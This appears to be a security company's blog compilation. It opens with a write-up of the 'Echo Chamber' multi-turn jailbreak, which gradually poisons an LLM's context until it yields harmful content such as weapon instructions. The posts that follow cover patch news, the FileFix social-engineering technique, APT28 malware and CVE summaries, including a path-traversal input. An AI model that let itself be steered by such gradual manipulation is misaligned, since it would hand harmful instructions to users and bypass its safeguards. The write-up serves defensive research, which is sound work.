The rapid advancement of large language models (LLMs) such as GPT-4 and Gemini-2 has significantly increased the capabilities of artificial intelligence systems. However, this progress has also exposed new vulnerabilities that malicious actors can exploit. One such threat, uncovered by NeuralTrust’s AI researcher Ahmad Alobaid, is the Echo Chamber attack—a sophisticated technique that bypasses LLM guardrails by exploiting the models’ reasoning capabilities through indirect manipulation. This article delves into the details of the Echo Chamber attack, how it works, its impact, and recommendations for mitigation.
Attack Overview
The Echo Chamber attack represents a novel form of jailbreak targeting LLMs. Unlike traditional attacks that rely on adversarial phrasing or obfuscation, the Echo Chamber attack subtly manipulates the model’s internal state through context poisoning. By introducing benign-seeming prompts that guide the model to dangerous conclusions, the attacker induces harmful outputs without ever explicitly requesting them. This clever use of indirect references and multi-turn reasoning bypasses traditional prompt filters and safety mechanisms, making it a potent weapon for adversaries.
The core of the attack lies in its ability to manipulate the model’s memory and reasoning across multiple interactions. Over time, the subtle cues introduced by the attacker build upon each other, slowly steering the model towards generating harmful or non-compliant content. This creates a feedback loop, amplifying the attacker’s goal and bypassing the LLM’s safety controls.
Example of the Echo Chamber Attack
In a controlled experiment, the Echo Chamber attack successfully bypassed safety filters of a leading LLM. When explicitly asked to write a manual for creating a Molotov cocktail, the model initially refused. However, through the Echo Chamber attack, the LLM eventually provided a step-by-step guide, detailing the ingredients and construction process for the weapon. This was achieved by manipulating the model’s internal state over several turns, showing the power of context poisoning.
How the Echo Chamber Attack Works
The Echo Chamber attack is a multi-stage adversarial prompting technique. Initially, the attacker defines a harmful objective, such as generating hate speech, misinformation, or prohibited instructions, without directly mentioning it. Instead, the attacker plants benign-seeming prompts that subtly hint at the goal, such as asking the model to “refer back to the second sentence in the previous paragraph.” This seemingly innocuous request triggers the model to recall earlier content, often guiding it to harmful topics.
In the next stage, the attacker introduces light semantic nudges that shift the model’s internal state. These prompts don’t directly point to harmful content but lay the groundwork for more damaging suggestions later. For example, a casual conversation about economic hardship can lead to frustrations, which are then exploited in subsequent interactions to escalate the conversation towards unsafe topics.
Once the model begins to generate harmful content, the attacker can reference earlier prompts to reinforce the dangerous ideas. The key to the attack’s effectiveness is its subtlety—each prompt is designed to appear natural within the conversation, making it difficult for traditional safety mechanisms to detect.
Effectiveness of the Attack
NeuralTrust’s evaluation of the Echo Chamber attack demonstrated its effectiveness across multiple leading LLMs, including GPT-4.1-nano, GPT-4o-mini, GPT-4o, Gemini-2.0-flash-lite, and Gemini-2.5-flash. The attack achieved a success rate of over 90% in categories like Sexism, Violence, Hate Speech, and Pornography, while also performing strongly in areas such as Misinformation and Self-Harm. Even in stricter categories like Profanity and Illegal Activity, the attack’s success rate exceeded 40%, highlighting its wide applicability across various content domains.
The attack typically achieved success within 1–3 turns, with the models showing increasing compliance as context poisoning took effect. Storytelling or hypothetical discussions were particularly effective, allowing the attacker to subtly steer the conversation towards the harmful objective.
Why the Echo Chamber Attack Matters
The Echo Chamber attack reveals a critical blind spot in LLM safety systems: their vulnerability to indirect manipulation via context and inference. Traditional defenses that focus on filtering explicit harmful content are insufficient when models can infer and build upon harmful objectives over multiple turns. This attack highlights a deeper flaw in current LLM alignment efforts, demonstrating that safety mechanisms must evolve to account for the subtle ways in which malicious actors can manipulate models.
In practical applications such as customer support bots, productivity assistants, and content moderators, this type of attack could be used to extract harmful outputs without triggering alarms, leading to potential misuse in real-world scenarios.
Mitigation Recommendations
To defend against Echo Chamber-style jailbreaks, developers and vendors should consider implementing context-aware safety auditing. This approach involves dynamically scanning the conversation history to identify patterns of emerging risk. Toxicity accumulation scoring can also help detect when benign prompts begin to form harmful narratives. Additionally, training safety layers to recognize indirect manipulation and fine-tuning models to detect and block such attempts can significantly improve defense mechanisms.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Microsoft’s July 2025 Patch Tuesday includes updates for 137 vulnerabilities, among them one publicly disclosed zero-day. Fourteen flaws are classified as critical, with the majority involving remote code execution, while others relate to information disclosure and hardware-level side channel attacks affecting AMD processors.
Breakdown of Vulnerabilities
This month’s update includes:
53 Elevation of Privilege vulnerabilities
41 Remote Code Execution vulnerabilities
18 Information Disclosure vulnerabilities
8 Security Feature Bypass vulnerabilities
6 Denial of Service vulnerabilities
4 Spoofing vulnerabilities
These totals do not include four Mariner or three Microsoft Edge vulnerabilities addressed earlier in the month. Non-security updates include patches for Windows 11 and Windows 10, though individual KB numbers were not listed in Microsoft’s summary release.
Zero-Day Vulnerabilities
One publicly disclosed zero-day is addressed in this month’s update.
CVE-2025-49719 | Microsoft SQL Server Information Disclosure Vulnerability
Affects: Microsoft SQL Server This flaw allows a remote, unauthenticated attacker to access data from uninitialized memory due to improper input validation. It can be exploited over a network without prior authentication. Administrators are advised to install the latest version of Microsoft SQL Server and update the Microsoft OLE DB Driver (version 18 or 19).
Microsoft has not shared details on how the disclosure occurred, but no active exploitation has been reported.
Other Critical Vulnerabilities
Microsoft addressed several critical remote code execution vulnerabilities this month, including:
CVE-2025-49704, a remote code execution vulnerability in Microsoft SharePoint, which can be exploited remotely by authenticated users over the internet.
Multiple Microsoft Office RCEs that can be triggered by opening a crafted document or viewing it in the preview pane.
Security updates for Microsoft Office LTSC for Mac 2021 and 2024 were not available at the time of release but are expected soon.
AMD and Other Vendor Updates
Security updates from other major vendors include:
AMD: Disclosed new transient execution side channel vulnerabilities based on Microsoft’s research into microarchitectural leakage boundaries.
Cisco: Released patches for various issues, including one involving hardcoded SSH root credentials in Unified Communications Manager (Unified CM).
Fortinet: Issued updates for FortiOS, FortiManager, FortiSandbox, FortiIsolator, and FortiProxy.
Google: Released a fix for an actively exploited Chrome zero-day (CVE-2025-6554). No Android patches were issued in the July 2025 bulletin.
Grafana: Addressed four Chromium-related vulnerabilities affecting the Image Renderer plugin and Synthetic Monitoring Agent.
Ivanti: Delivered updates for Ivanti Connect Secure, Policy Secure, EPMM, and EPM. None of the issues were reported as exploited.
SAP: Released fixes for several products and reclassified CVE-2025-30012 in SAP Supplier Relationship Management as a critical flaw, now rated 10.0.
Recommendations for Users and Administrators
Organizations should prioritize patching Microsoft SQL Server, Office, and SharePoint deployments, especially those accessible from external networks. While the SQL Server flaw is not known to be exploited, its public disclosure increases the risk of future exploitation. Systems with outdated OLE DB drivers should be updated alongside SQL Server patches.
Security teams should also review AMD’s disclosure on transient scheduler attacks, as well as vendor patches from Cisco, Google, and SAP addressing high-severity and actively exploited vulnerabilities.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Taiwan NSB Warns of Security Risks from China-Developed Apps
Understanding the Relationship Between NIS2 and the EU Cyber Resilience Act
How can Netizen help?
Taiwan NSB Warns of Security Risks from China-Developed Apps
Taiwan’s National Security Bureau (NSB) has issued a public warning about the security risks posed by China-developed apps such as RedNote (Xiaohongshu), Weibo, TikTok, WeChat, and Baidu Cloud, citing concerns over excessive data collection and the transfer of personal data to China.
This alert follows a comprehensive inspection of these apps, conducted in collaboration with the Ministry of Justice Investigation Bureau (MJIB) and the Criminal Investigation Bureau (CIB). The NSB identified significant security issues across the apps, including the collection of sensitive personal data such as facial recognition, clipboard content, contact lists, location data, and more. Additionally, all the apps were found to transmit data back to servers in China, raising concerns about the potential misuse of this information.
According to the NSB’s analysis, RedNote violated all 15 security indicators evaluated, followed by Weibo and TikTok with breaches in 13 categories, and WeChat and Baidu Cloud with violations in 10 and 9 areas, respectively. The warning highlights that companies operating in China are required by law to hand over user data for national security and intelligence purposes, further amplifying the privacy risks for Taiwanese users.
This move follows similar actions in other countries like India, which banned Chinese apps over security concerns, and Canada, which recently ordered TikTok to cease operations. The U.S. has also extended its ban on TikTok, leaving its future uncertain. As global concerns over data privacy grow, the NSB urges the public to exercise caution when using China-made apps, stressing the importance of protecting personal and business data.
Understanding the Relationship Between NIS2 and the EU Cyber Resilience Act
The European Union has introduced two significant regulations aimed at strengthening cybersecurity: the NIS2 Directive and the Cyber Resilience Act (CRA). Both are designed to address vulnerabilities in essential services and digital products within the EU, with an emphasis on secure-by-design principles and comprehensive cybersecurity practices.
The NIS2 Directive, effective from January 2023, mandates that essential service providers in sectors like energy, transport, healthcare, and finance implement strong risk management practices, report incidents promptly, and collaborate across EU member states. This regulation is crucial for maintaining the security and reliability of critical infrastructure, especially as cyber threats continue to evolve. NIS2 requires that organizations designated as “essential” or “important” within the EU ensure robust cybersecurity controls are in place. Member states have until October 2024 to integrate this directive into their national laws, with full compliance required within 21 months.
On the other hand, the Cyber Resilience Act (CRA) focuses on the security of digital products. Effective from December 2024, the CRA mandates that manufacturers incorporate cybersecurity features into their products before they can be marketed within the EU. This “secure-by-design” approach ensures that digital products, whether hardware or software, undergo rigorous security assessments, are regularly updated throughout their lifecycle, and meet established EU cybersecurity standards. The CRA applies to all products with digital components, aiming to reduce vulnerabilities and safeguard users from potential cyber threats.
While NIS2 focuses on securing essential services, the CRA addresses the security of products entering the EU market. These two regulations complement each other and aim to establish a consistent and strong cybersecurity framework across the EU. However, organizations must navigate the distinct requirements of each regulation to ensure full compliance.
For many companies, aligning with both NIS2 and CRA requirements may appear daunting, but the regulations share common principles with existing frameworks like NIST CSF and ISO 27001. Companies with mature security practices will likely find that enhancing their existing frameworks will enable them to meet EU-specific requirements more efficiently. For smaller enterprises, particularly those in the product development space, the transition may involve substantial investments in technology, training, and new processes to meet these security standards.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
The U.S. Justice Department has recently taken significant action against North Korean schemes involving IT workers infiltrating U.S. companies. These operations, which have persisted for several years, are part of a coordinated effort to exploit remote work opportunities for the North Korean regime’s benefit.
The Indictments Exposed
The recent indictments included charges against Chinese, Taiwanese, and even a U.S. citizen, Zhenxing “Danny” Wang of New Jersey. Wang, who was arrested, allegedly helped facilitate remote IT work at over 100 U.S. companies, including many Fortune 500 firms. From 2021 to 2024, the conspirators used compromised U.S. identities and shell companies to create the illusion of legitimate employment for North Korean IT workers. They exploited these fake identities to access U.S. laptops, enabling the remote workers to carry out IT tasks and avoid detection. The facilitators received almost $700,000 for their efforts, while the damage to the companies and the U.S. government was far greater, including over $3 million in legal fees and network remediation costs.
One particularly alarming aspect of the scheme was a North Korean IT worker gaining access to sensitive employer data, including source code related to AI technology used by a U.S. defense contractor. This raises serious concerns about national security risks and the potential for espionage via these cyberattacks.
In addition to these actions, the Justice Department indicted four North Korean nationals accused of stealing $900,000 in virtual currency through a scheme targeting blockchain research companies. They operated from the UAE, coordinating with firms in Atlanta and Serbia, before laundering the stolen funds.
Searches, Seizures, and Financial Actions Taken
In a show of force against these coordinated operations, U.S. authorities conducted searches of 29 known or suspected “laptop farms” across 16 states. These facilities were believed to be used as hiding spots for remote North Korean IT workers, evading identification and tracing efforts. The Justice Department also seized 29 financial accounts linked to laundering the illicit funds from the first scheme, as well as 21 fraudulent websites involved in the operation.
Leah Foley, U.S. Attorney for the District of Massachusetts, warned, “The threat posed by DPRK operatives is both real and immediate. Thousands of North Korean cyber operatives have been trained and deployed by the regime to blend into the global digital workforce and systematically target U.S. companies.” Foley’s comments underline the critical need for continued vigilance in cybersecurity.
Microsoft Takes Action: Suspended Accounts and Ongoing Monitoring
In response to the growing threat, Microsoft disclosed that it had suspended 3,000 consumer-grade Outlook and Hotmail accounts linked to suspected North Korean IT worker schemes. The company also alerted affected customers via Microsoft Entra ID Protection and Microsoft Defender XDR. Microsoft tracks this activity under the names Jasper Sleet (formerly known as Storm-0287), Storm-1877, and Moonstone Sleet, as the threat actors continue to target organizations worldwide.
Microsoft’s observations reveal a troubling trend where facilitators—often outside of North Korea—play a crucial role in validating fraudulent identities. These individuals manage logistics such as forwarding company hardware and creating profiles on freelance job websites to maintain the ruse of legitimate employment. As part of this process, workers are trained to use VPNs, proxy services, and remote management tools (RMM) to connect to devices housed in laptop farms located in countries where they can avoid detection.
AI and Technology in North Korean Fraud
As technology evolves, so do the tactics of cybercriminals. North Korean hackers are increasingly leveraging artificial intelligence (AI) to improve the efficacy of their fraudulent schemes. AI tools are used to refine fake resumes, manipulate worker images, and even generate convincing voice recordings. This innovation in social engineering tactics makes it even harder for companies to detect fraudulent activity and verify the authenticity of remote workers.
Microsoft explained that these state-backed fraudsters utilize AI to enhance their capabilities, making their attacks more sophisticated and convincing. From generating realistic resumes to altering digital identities, AI has become a crucial part of North Korea’s strategy to infiltrate the global workforce and target critical U.S. businesses.
Protecting Against North Korean IT Worker Schemes
The increasing sophistication of North Korean cyberattacks demands comprehensive security measures for businesses. Microsoft has compiled a list of investigation, monitoring, and remediation recommendations to help organizations protect themselves from these types of social engineering and IT worker infiltration.
For businesses operating in sectors where IT outsourcing or remote work is common, it is crucial to verify the identities of remote workers carefully. Enhanced monitoring of logins and network activity, along with strict authentication protocols, can prevent unauthorized access. Additionally, companies must ensure their cybersecurity teams are aware of the latest tactics and tools used by these threat actors, including VPNs, RMM tools, and AI-driven identity manipulation.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
In recent months, a surge in social engineering techniques has raised alarms across cybersecurity communities. Among these methods, ClickFix has gained attention as a relatively simple but highly effective way to exploit unsuspecting users. If you’re not familiar with ClickFix, it’s a social engineering attack that prompts users to unknowingly execute malicious commands, typically using the Windows Run Dialog (Windows Key + R). While this technique has been surprisingly successful, it heavily relies on the Run Dialog, which some might argue is too basic or impractical. But the effectiveness of ClickFix cannot be denied.
However, as cybersecurity experts continue to adapt to new threats, one researcher decided to explore an alternative method to achieve similar results without relying on the traditional Run Dialog. Enter FileFix, a clever variation of ClickFix that bypasses some of the browser’s restrictions and manipulates users into executing OS commands—without ever leaving their browser window.
What is FileFix?
The idea behind the FileFix attack is simple yet innovative. It takes advantage of a common functionality in most browsers—the file upload feature. Users are familiar with file uploads: clicking an “Upload” button, browsing to a file, and then selecting it for upload. This functionality is found everywhere, from job application portals to online email clients, making it a well-understood feature. But what many don’t realize is that the File Explorer Address Bar (the place where users usually type or paste file paths) can also be used to execute OS commands. This particular feature is typically ignored by browsers, which makes it an effective target for social engineering.
In this method, an attacker can convince a user to open File Explorer through a file upload button and paste a maliciously crafted command into the address bar. The command will then execute without the user’s knowledge, potentially giving the attacker access to the system. The attacker can hide their malicious code behind what appears to be a harmless file path, such as C:\company\internal-secure\filedrive\HRPolicy.docx, while in reality, the path is appended with a PowerShell command, like:
The attack takes advantage of a feature that many users aren’t aware of and could be incredibly difficult to detect using conventional security tools.
How Does FileFix Work?
The attack begins by creating a phishing page that prompts the user to interact with a file path. The phishing page will include an “Open File Explorer” button that, when clicked, triggers the File Explorer window to open. It also copies the malicious PowerShell command to the clipboard. When the user pastes the file path into File Explorer’s address bar, the command executes, and the attacker gains access.
Here’s the step-by-step breakdown:
User interaction: The attacker’s phishing page asks the user to open File Explorer and enter a file path.
Command hidden in plain sight: The file path is designed to look legitimate (e.g., C:\company\internal-secure\filedrive\HRPolicy.docx), but it secretly contains a PowerShell command after the file path (such as a command to ping an external server).
Execution through File Explorer: When the user pastes the path into the address bar and presses enter, the OS command executes, allowing the attacker to gain access to the system.
Blocking File Selection
An interesting part of the FileFix attack is the user’s ability to accidentally or intentionally select a file for upload, which could complicate matters for the attacker. However, in this case, the attacker has anticipated this by adding a script that blocks the file upload event. If the user selects a file, the attacker’s code will alert the user, clear the file input, and force the File Explorer window to reopen, thus ensuring the user doesn’t deviate from the intended steps.
Here’s the code snippet that blocks the file selection:
One critical aspect of the FileFix attack is that File Explorer can be used to execute commands without triggering security alerts in some cases. While this isn’t an entirely new concept, it’s certainly a new and creative way to leverage a well-known feature in a way that hasn’t been exploited as extensively before.
For instance, an attacker might attempt to download an executable file (such as payload.exe), copy its location to the clipboard, and then prompt the user to execute the command from the File Explorer address bar. This removes the “Mark of the Web” (MOTW) attribute that would usually appear for files downloaded from untrusted sources, making it more difficult for security tools to detect the file as malicious.
The Risks of FileFix
FileFix, much like ClickFix, is an attack that relies on social engineering. The attacker has to convince the user to follow seemingly innocent steps, such as opening File Explorer and pasting a file path. However, the attack could be much more effective if combined with other methods, such as phishing or malware delivery.
While this technique might seem fairly basic at first glance, its simplicity makes it a potent weapon in the arsenal of cybercriminals. And because it takes advantage of browser functionality that is generally trusted, it could bypass some of the security controls we commonly expect to be in place.
Mitigating the FileFix Attack
While there’s no foolproof way to prevent all social engineering attacks, there are some steps that can help minimize the risk of falling victim to FileFix:
Educate Users: Make sure employees or users understand the dangers of clicking on suspicious links or interacting with unknown websites. Cybersecurity training should include awareness of phishing tactics and how to recognize suspicious behavior.
Endpoint Security: Always ensure that endpoint protection tools are in place to detect and block malicious activities. These tools should be capable of recognizing suspicious PowerShell scripts or other abnormal processes running on a machine.
Monitor Suspicious Activities: Regularly monitor systems for unusual activity, especially with respect to File Explorer, browser behavior, and any attempts to execute commands outside of normal user activity.
Limit File Explorer Usage: Limit user access to File Explorer or restrict the use of browser-based file upload functionality to prevent unintended execution of commands.
Browser Configuration: Configure browsers to block or restrict the use of the File Explorer address bar for executing OS commands, and disable features that could be used for similar attacks.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is an ISO 27001:2013 (Information Security Management), ISO 9001:2015, and CMMI V 2.0 Level 3 certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Questions or concerns? Feel free to reach out to us any time –
Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack
APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine
How can Netizen help?
Citrix Bleed 2: Over 1,200 Servers Vulnerable to Authentication Bypass Attack
On June 30, 2025, cybersecurity experts reported that more than 1,200 Citrix NetScaler ADC and NetScaler Gateway appliances exposed online remain unpatched against a critical vulnerability, CVE-2025-5777, which is believed to be actively exploited. This flaw, referred to as “Citrix Bleed 2,” allows threat actors to bypass authentication mechanisms and hijack user sessions by exploiting an out-of-bounds memory read vulnerability caused by insufficient input validation. Successful exploitation of this vulnerability could lead to attackers stealing session tokens, credentials, and other sensitive data from public-facing gateways and virtual servers, granting them access to restricted memory regions and enabling them to bypass multi-factor authentication (MFA).
Citrix previously experienced a similar issue, “CitrixBleed,” which was exploited in ransomware attacks in 2023, targeting government organizations and moving laterally across compromised networks. The newly discovered vulnerability, CVE-2025-5777, is of critical severity, and Citrix issued an advisory on June 17, 2025, urging customers to upgrade their appliances and terminate all active ICA and PCoIP sessions to block potential attacks.
Although Citrix has not yet confirmed public exploitation of CVE-2025-5777, security researchers from ReliaQuest assessed with medium confidence that the vulnerability is actively being exploited in targeted attacks. These attacks have shown indicators of post-exploitation activity, including hijacked Citrix web sessions, MFA bypass attempts, and suspicious LDAP queries linked to Active Directory reconnaissance. Additionally, security analysts from the Shadowserver Foundation discovered that over 2,100 Citrix NetScaler appliances were also unpatched against another critical vulnerability, CVE-2025-6543, which is currently being exploited in denial-of-service (DoS) attacks.
Both CVE-2025-5777 and CVE-2025-6543 are classified as critical severity vulnerabilities, prompting cybersecurity experts to advise administrators to immediately deploy the latest patches from Citrix to mitigate potential risks. Companies are also encouraged to review access controls and monitor their Citrix NetScaler appliances for unusual user sessions and activities to prevent further exploitation.
APT28’s New Malware Campaign: Signal Chat Delivers BEARDSHELL and COVENANT to Ukraine
The Computer Emergency Response Team of Ukraine (CERT-UA) has issued an alert about a new cyber attack campaign carried out by the Russian-linked APT28 (also known as UAC-0001) threat group. This campaign utilizes Signal chat messages to distribute two previously undetected malware families, BEARDSHELL and COVENANT, targeting Ukrainian entities.
According to CERT-UA, BEARDSHELL is a C++-based malware that allows threat actors to download and execute PowerShell scripts. The malware also enables the upload of results back to a remote server via the Icedrive API. The malware first appeared in March-April 2024 during incident response efforts on a Windows machine. At the time, the exact infection method was unknown, but recent intelligence from ESET linked the malware to a breach of a “gov.ua” email account, likely indicating government-targeted attacks.
Further investigation led to the discovery of the malware framework COVENANT, which operates as part of a multi-layered attack. In the campaign, APT28 is using Signal messages to send malicious macro-laden Microsoft Word documents. These documents, when opened, deploy two payloads: a malicious DLL (“ctec.dll”) and a PNG image (“windows.png”). The embedded macro also makes Windows Registry changes to ensure the DLL is loaded when Windows File Explorer is next launched. The primary function of the DLL is to execute shellcode embedded in the PNG, triggering the COVENANT framework to execute.
COVENANT subsequently downloads two additional payloads that facilitate the execution of the BEARDSHELL backdoor on compromised systems. The BEARDSHELL backdoor provides persistent access to the infected systems, allowing threat actors to maintain long-term control.
The malware is delivered via Signal chat, exploiting the Signal app’s ability to distribute files securely, making the attack harder to trace. For those defending against this threat, CERT-UA recommends monitoring network traffic associated with domains like “app.koofr[.]net” and “api.icedrive[.]net,” which are used for communication with the malware’s command-and-control servers.
In parallel to this malware campaign, APT28 has been targeting outdated versions of the Roundcube webmail software used in Ukrainian organizations. Exploiting vulnerabilities like CVE-2020-35730, CVE-2021-44026, and CVE-2020-12641, APT28 is delivering malicious JavaScript payloads through phishing emails. These emails disguise themselves as news articles but, once opened, exploit the vulnerabilities to execute arbitrary JavaScript, exfiltrate user data, and install further malware on the victim’s system.
One of the scripts, “e.js,” creates a mailbox rule to redirect incoming emails to a third-party address, while exfiltrating session cookies and the victim’s address book. The second, “q.js,” exploits an SQL injection vulnerability in Roundcube to extract information from the Roundcube database. A third file, “c.js,” exploits another vulnerability to execute arbitrary commands on the mail server.
These vulnerabilities were leveraged in phishing emails sent to over 40 Ukrainian organizations, highlighting the group’s persistence and evolving tactics. CERT-UA continues to monitor these activities and urges organizations to patch vulnerabilities, implement robust email security filters, and monitor network traffic for any signs of compromise.
To defend against these threats, CERT-UA advises organizations to:
Ensure all systems are up to date with the latest patches.
Disable macros in Microsoft Word and other Office applications.
Monitor network traffic for unusual activity related to Icedrive and Koofr domains.
Regularly audit email systems for signs of compromise, particularly for suspicious redirection or exfiltration activity.
How Can Netizen Help?
Netizen ensures that security gets built-in and not bolted-on. Providing advanced solutions to protect critical IT infrastructure such as the popular “CISO-as-a-Service” wherein companies can leverage the expertise of executive-level cybersecurity professionals without having to bear the cost of employing them full time.
We also offer compliance support, vulnerability assessments, penetration testing, and more security-related services for businesses of any size and type.
Additionally, Netizen offers an automated and affordable assessment tool that continuously scans systems, websites, applications, and networks to uncover issues. Vulnerability data is then securely analyzed and presented through an easy-to-interpret dashboard to yield actionable risk and compliance information for audiences ranging from IT professionals to executive managers.
Netizen is a CMMI V2.0 Level 3, ISO 9001:2015, and ISO 27001:2013 (Information Security Management) certified company. We are a proud Service-Disabled Veteran-Owned Small Business that is recognized by the U.S. Department of Labor for hiring and retention of military veterans.
Security vulnerabilities are a common occurrence in managing any business’s organizational security. The prompt patching and remediation of any new vulnerabilities are critical to reducing the outside attack surface. Netizen’s Security Operations Center (SOC) has compiled five critical vulnerabilities from June that should be immediately patched or addressed if present in your environment. Detailed writeups below:
CVE-2024-54085
CVE-2024-54085 describes a critical authentication bypass vulnerability affecting American Megatrends International’s (AMI) SPx firmware, specifically within the Baseboard Management Controller (BMC). This flaw allows a remote attacker to bypass authentication mechanisms when interfacing through the Redfish Host Interface, enabling unauthorized access without user interaction or credentials. The vulnerability affects systems using AMI’s MegaRAC SPx firmware—commonly integrated into servers for out-of-band management—which magnifies its potential impact across enterprise environments and data centers.
The attack vector is particularly dangerous due to its placement at the firmware level. By abusing the Redfish API exposed by the BMC, an attacker can gain privileged access to critical server management functions. This includes the ability to issue power controls, flash firmware, or even wipe or reconfigure the host system remotely. Exploiting this interface requires no local access, no authentication, and no user interaction—only network reachability. As a result, the vulnerability poses a direct threat to the confidentiality, integrity, and availability of affected systems.
Reports published in June 2025 indicate that this flaw is being actively exploited in the wild. Attackers have used it to deploy destructive malware capable of bricking servers or persisting stealthily within BMC firmware. According to CISA and Eclypsium, exploitation campaigns have targeted thousands of vulnerable devices globally, and widespread scanning for exposed Redfish interfaces has been observed.
The vulnerability was officially assigned CVE-2024-54085 and carries maximum severity scores across CVSS v2 (10.0), v3.1 (9.8), and v4.0 (10.0), underscoring the total system compromise potential. Organizations with exposed or internet-facing BMC interfaces—especially those running outdated AMI SPx firmware—should prioritize patching and segmenting their management networks. Updates and mitigation guidance have been made available through vendors such as NetApp and advisories from national cybersecurity agencies. Given the nature of the vulnerability, immediate action is required to prevent exploitation and irreversible damage to critical infrastructure.
CVE-2025-6543
CVE-2025-6543, widely dubbed “Citrix Bleed 2,” is a critical memory overflow vulnerability affecting NetScaler ADC and NetScaler Gateway appliances. The flaw emerges when these appliances are configured in Gateway mode—specifically as a VPN virtual server, ICA Proxy, CVPN, RDP Proxy, or AAA virtual server. When exploited, it leads to unintended control flow and Denial of Service (DoS), allowing an unauthenticated attacker to crash affected services or cause unpredictable behavior.
This vulnerability was confirmed to be exploited as a zero-day prior to public disclosure. Its addition to CISA’s Known Exploited Vulnerabilities catalog and the subsequent emergency advisories from vendors and government agencies signal that threat actors moved quickly to abuse the flaw in the wild. Reports from June 2025 document the use of this bug in denial-of-service attacks targeting enterprise gateway infrastructure. The potential for remote exploitation without prior authentication makes it particularly attractive for both disruption campaigns and access footholds, depending on how it’s chained with other weaknesses.
While the CVSS v2 score appears moderate at 5.0 due to limited immediate impact on confidentiality and integrity, the CVSS v3 score is 7.5 and the CVSS v4 score reaches 9.2—highlighting how newer scoring systems better reflect real-world risks associated with denial-of-service on critical edge infrastructure. The low CVSSv2 score fails to capture the severity of an attack that can render VPN and remote access services unusable during business hours, or which could serve as a stepping stone in more complex intrusion paths.
Administrators running affected Citrix NetScaler versions are strongly urged to apply the emergency patches issued by Citrix and verify that public-facing services are not vulnerable. Beyond patching, affected organizations should review VPN and gateway logs for signs of repeated crashes or traffic anomalies beginning in mid-June 2025, which may indicate early-stage exploitation attempts or reconnaissance.
CVE-2024-0769
CVE-2024-0769 describes a critical path traversal vulnerability discovered in D-Link’s DIR-859 wireless router, version 1.06B01. The flaw lies in the HTTP POST request handler at the endpoint /hedwig.cgi, where the service parameter can be manipulated to perform directory traversal. By passing crafted input such as ../../../../htdocs/webinc/getcfg/DHCPS6.BRIDGE-1.xml, an unauthenticated remote attacker can access configuration files not intended to be publicly exposed, leading to unauthorized disclosure of sensitive system information.
The issue stems from a failure to properly sanitize input within the POST request handler. This allows external actors to bypass expected restrictions and reach arbitrary files within the router’s internal file system. The attacker does not require any special privileges or user interaction to exploit this flaw, and the attack can be conducted entirely over the network. Proof-of-concept code was made public and has been observed in use, suggesting this is an active risk for any remaining DIR-859 units still online.
